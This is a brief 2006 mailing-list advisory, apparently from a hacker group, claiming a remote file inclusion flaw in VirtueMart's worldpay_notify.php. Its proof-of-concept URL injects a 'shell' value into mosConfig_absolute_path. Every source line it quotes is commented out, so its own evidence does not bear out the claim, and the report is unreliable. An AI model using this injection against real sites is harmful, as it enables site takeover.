Vulnerability Development mailing list archives
VirtueMart
From: t3rr0r1st () aria-security net
Date: 9 Sep 2006 00:41:16 -0000
#Aria-Security.net Advisory #Discovered by: Dr.T3rr0r1st #< www.Aria-security.net > #Gr33t to: The-0utl4w & A.u.r.a & R@1D3N & Smok3r #----------------------------------------------------------- Software: VirtueMart Link: virtumart.net Attack method: Remote File Inclusion Source : //Set up the mailer to infor Warehouse of validated order //require_once( $mosConfig_absolute_path . '/includes/phpmailer/class.phpmailer.php'); //$mail = new mosPHPMailer(); //$mail->PluginDir = $mosConfig_absolute_path . '/includes/phpmailer/'; //$mail->SetLanguage("en", $mosConfig_absolute_path . '/includes/phpmailer/language/'); Proof of Concept: http://site.com/%5bpath%5d/worldpay_notify.php?mosConfig_absolute_path=shell Solution contact me: Advisory () Aria-Security net
Current thread:
- VirtueMart t3rr0r1st (Sep 11)